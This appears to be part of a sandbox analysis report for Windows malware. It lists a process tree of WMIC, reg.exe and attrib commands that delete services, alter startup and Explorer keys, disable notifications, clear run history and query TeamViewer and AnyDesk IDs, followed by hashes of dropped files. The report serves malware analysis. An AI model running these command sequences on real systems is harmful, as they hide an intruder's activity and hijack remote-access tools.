                                                                                                                                                                                                                                                                                    C:\Windows\System32\wbem\WMIC.exe Service Where "name like 'ServiceNetwork'" Call Delete
                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                      PID:1784
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                      C:\Windows\System32\wbem\WMIC.exe Service Where "name like 'Service Network'" Call Delete
                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                        PID:2660
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                        C:\Windows\System32\wbem\WMIC.exe service where "name like 'loadhost'" call stopservice
                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                          PID:2564
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                          C:\Windows\System32\wbem\WMIC.exe service where "name like 'loadhost Service'" call stopservice
                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                          PID:2004
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                          C:\Windows\System32\wbem\WMIC.exe Service Where "name like 'loadhost'" Call Delete
                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                            PID:1828
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                            C:\Windows\System32\wbem\WMIC.exe Service Where "name like 'loadhost Service'" Call Delete
                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                              PID:1952
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                              C:\Windows\System32\wbem\WMIC.exe service where "name like 'loadhostDhcp'" call stopservice
                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                PID:2440
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                C:\Windows\System32\wbem\WMIC.exe service where "name like 'loadhost Dhcp'" call stopservice
                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                  PID:288
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\System32\wbem\WMIC.exe Service Where "name like 'loadhostDhcp'" Call Delete
                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                    PID:2932
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\System32\wbem\WMIC.exe Service Where "name like 'loadhost Dhcp'" Call Delete
                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                    PID:1060
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\System32\wbem\WMIC.exe Service Where "name like 'System'" Call Delete
                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                      PID:2412
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\sv.ini"
                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                      PID:2224
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\Unicod.cmd"
                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                      PID:2692
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\System32\reg.exe delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v TeamViewer /f
                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                        PID:2772
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\System32\reg.exe delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /v TeamViewer /f
                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                          PID:2924
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\System32\reg.exe delete "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /f
                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                            PID:3028
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                              PID:2896
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d "0x0" /f /reg:64
                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                              PID:2944
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d "0x0" /f
                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                PID:1596
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d "0" /f /reg:64
                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                  PID:2864
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                    PID:2180
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\reg.exe add "HKCU\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d "1" /f /reg:64
                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                      PID:880
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\reg.exe add "HKCU\SYSTEM\CurrentControlSet\Control\Windows" /v NoInteractiveServices /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                        PID:1020
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\reg.exe add "HKCU\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                          PID:1796
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\Windows Error Reporting" /v "DontShowUI" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                            PID:692
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\System32\reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /va /f
                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                              PID:3052
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /v a /t REG_SZ /d cmd\1 /f
                                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                                PID:1396
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /v MRUList /t REG_SZ /d a /f
                                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                                  PID:1524
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\ping.exe 192.168.1.1 -n 2
                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                  PID:1044
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\ping.exe 192.168.1.1 -n 2
                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                  PID:3044
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\ping.exe 192.168.1.1 -n 2
                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                  PID:2856
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\ping.exe 192.168.1.1 -n 2
                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                  PID:2600
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\ping.exe 192.168.1.1 -n 2
                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                  PID:2112
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\tasklist.exe"
                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                  PID:1568
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\findstr.exe /i /c:"IntelSvc" /c:"tv_x86" /c:"fontdrvhots"
                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                    PID:2660
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\tasklist.exe /FI "IMAGENAME eq TeamViewer.exe"
                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                    • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                    PID:2136
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\findstr.exe /i /c:"TeamViewer"
                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                      PID:2212
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\ping.exe 192.168.1.1 -n 2
                                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                      PID:1156
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c C:\Windows\System32\findstr.exe /i /c:"IdGetter id:" /c:"] id: " "C:\ProgramData\USOShared\web.ttf"
                                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                                        PID:940
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\findstr.exe /i /c:"IdGetter id:" /c:"] id: " "C:\ProgramData\USOShared\web.ttf"
                                                                                                                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                          PID:952
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\reg.exe query "HKLM\Software\Wow6432Node\TeamViewer" /v "ClientID"
                                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                                          PID:2440
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\reg.exe query "HKLM\Software\TeamViewer" /v "ClientID"
                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                            PID:1712
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\System32\tasklist.exe /FI "IMAGENAME eq AnyDesk.exe"
                                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                                            • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                            PID:2844
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\System32\findstr.exe /i /c:"AnyDesk"
                                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                                              PID:2684
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\ping.exe 192.168.1.1 -n 2
                                                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                              PID:2932
                                                                                                                                                                                                                                                                                                                              • C:\ProgramData\IntelSvc.exe
                                                                                                                                                                                                                                                                                                                                "C:\ProgramData\IntelSvc.exe" w -install_service -install_service
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                PID:2380
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                  PID:960

                                                                                                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\USOShared\web.ttf

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  932B

                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                  403a8997e53584831fcf1c2f6cc9b4c1

                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                  37e37925ecfdb8e04a69cb58697ddee55a363aac

                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                  2389cd4e523cd048f0ed29112ceecdc02b1b5dd02def31db02443fa87e5e1b98

                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                  8d11458eb6a934b1b72c1ddfbc131d845a7a0c93844aa6f2fcd347f9fa04644eb12f13e144de891d0a498cff1cc1c02098ea4ad9f145c46ae49f2e4a064ea79d

                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\AnyDesk.txt

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  5.1MB

                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                  e6f473bd5340405656209e620f43068f

                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                  c144446dc23c86c7c9b26ce87c3176866372f6d1

                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                  bed33c3732307e19e9a702e7ff179180a7891b92cb879a5b758021eefc68a99b

                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                  2e9065caeadcef0edd1e8e8fe3139e0fc5a9dd46011dbc0a4666745ed817cfaf6f859c9f1b5c1e5e957476cb16b42dcf14508594e44f2a059706865c19866a4c

                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IntelSvc.txt

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  2.6MB

                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                  b421f64f1b1fd85f4f7e1aa9597843c7

                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                  cd7f089e47be78459f062468ebb22b4ded63b14a

                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                  7e8c114ef41fe925f5c5dafc1e58eee25fef47d113fb5a08ae65b2c4418a52bb

                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                  130272e33d1c43bb3053390a7e12322ea49faacce883ad1acd577c47469a198f8283ec9fe4b343e467d4d0db883fdbeda06a50556bd951c3bc35505fdc8f73e4

                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\NhStart3.cmd

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  172KB

                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                  f8a2f29209debdea062ab8d3a5661baa

                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                  44731e706e1dd909eb0dc0346da57cc3871f0aae

                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                  00c61945138d641a0bb834b02953e3e291d6c6dd93660954db4dd1f2752b2b0f

                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                  36f7fe41bc80047ce90358158bb715d4437bcde8137eb09bfa6c41257ae04952b97c9299b004122e7df785ad3a2f17ed688826ae160ed83decc8b438008aba36

                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Pst.txt

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  36B

                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                  1c2349d78149035ec324ef221af89a7f

                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                  7a5fe3bccf80995db71879d39cebbb30e4758417

                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                  ad9e97b9f2190ba89ce6f4cc70f1c7b4a45d2603dac2c2cd81d0b30dac2c456f

                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                  aadc21c0a490f21d1fbc61c7bc1ec5b58671590e8377bbdf69f94d2b2157c4ef3dbdc84ce31cf82cc74e87ca5b8b44a40699248e118895c042c2a324dd9393c1

                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RtkAudio.txt

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  6.2MB

                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                  4ee807c47f20d7f7506bbd62b61dc7af

                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                  36154cab3b7f7c38b1b03e47b301f17dbbd6fc6e

                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                  2461dfdb152d7a244939a024d647758e15ea4832c9b3e1322a697ec49b8bfbb9

                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                  e33e68f58f49719c18f9f67640daff10e9ccfcfd8751e2262baa02c514fa4c21b041d4fee968edeea51f9ffcab436c205c88c418a4b18533922780152e80e123

                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.txt

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  383KB

                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                  ac27de51896a5ba2fd0dda9b7955a201

                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                  864a95def336b50c70300ff6a7c553f0095a535a

                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                  35d3f6c87cc33f2fda5b594a6990d8d14e085e313564127a9c0606cedb398f93

                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                  cd25f4bdc8e6dd845f5c836f50259e2e2c291d99b37071f30007fa13edeb2d8c82880bf9eefdb363309c9128f78c7e451954b98abefa039ea12e33548771d625

                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Start.cmd

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  177KB

                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                  1ad35960f7d224ef4a414d5a87dd8218

                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                  e0b3500e476e305febe1daa6106bc939731c6403

                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                  d11ace560ac7577233cbe8e646d9b231a9fa9f94cf3bd07e40008d5f69591b0f

                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                  76ef0814a4cd4b9326f9b897fcb123f257e25495ff88c40c1f249ae57dfa9a7c4bd003c361f7b8e31162a4c548c4a94134d45670713d4c80da3b2d8af18e8ee3

                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Start2.cmd

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  175KB

                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                  ce6c8ad21d7c561d7f023b1ae8d23b3d

                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                  f620c06f763efdcb615a536c9b1ecd0dccb67b6c

                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                  0308de42308d393fa3f343883395f5bd4a5ac5674d4abfbc1c772d2ce593ea04

                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                  2cc5d9785abade7dec6ab91f381ce8d49d271d6440941b2c849a0e542066386805b2af4c746516060ddeeca22f4c45f5bc615c0f37da2fee139d07b7f14d6a25

                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Systemfont.txt

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  1.0MB

                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                  3c47d45f09948b8e6fdb5f96523bc60b

                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                  a890eaae8d5a45d54e7571c4bf780a6eb263586a

                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                  86bb64d0a8d548445e17d4edef0a0e5f97d019f3af524fc9cd625294916c973d

                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                  6b67bb4268595480261ff007058f59aa4505204278b3b094551f14132e9faf7160019b155831d9ab75d5cab64c1ac9ad1ceb4a7b6fb5ced87e144e475a74790c

                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Test1.txt

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  7B

                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                  6d390f918934c2142addb44c52cbc691

                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                  e66d6dc343ae53c9e2882487f4105eb08ab5c740

                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                  98d76dd27328cfafd87a64c1da3f01ca0d6bd9470d394fd920b63ae1d02fb535

                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                  c62367444708fa6c18a00c841b729f6a96f6de94fc927b6295257d131f7030a31a076966e50f8fdf21a484ff00bc3d93c0f85b02dae104de2074bb77076cf9a6

                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\WinRing0x64.txt

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  14KB

                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                  0c0195c48b6b8582fa6f6373032118da

                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                  d25340ae8e92a6d29f599fef426a2bc1b5217299

                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                  11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                  ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\cmdow.txt

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  86KB

                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                  ddd12566b99343b96609afa2524ecec3

                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                  8fef2c2bc87ef7d135296fdb4cf9ecd9c0322d55

                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                  767b877e735c425bf05c34683356abfde4070b092f17a4741ea5ac490611f3de

                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                  b11a36b25b5c34cd86c367c4003f76f360965fdbc67ca1f30afec3a744d419c03d70ade2423ad6a1d2858561f732db9f1d1a279a37b045f8a5faa9c53dbe30bd

                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\screen.txt

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  44KB

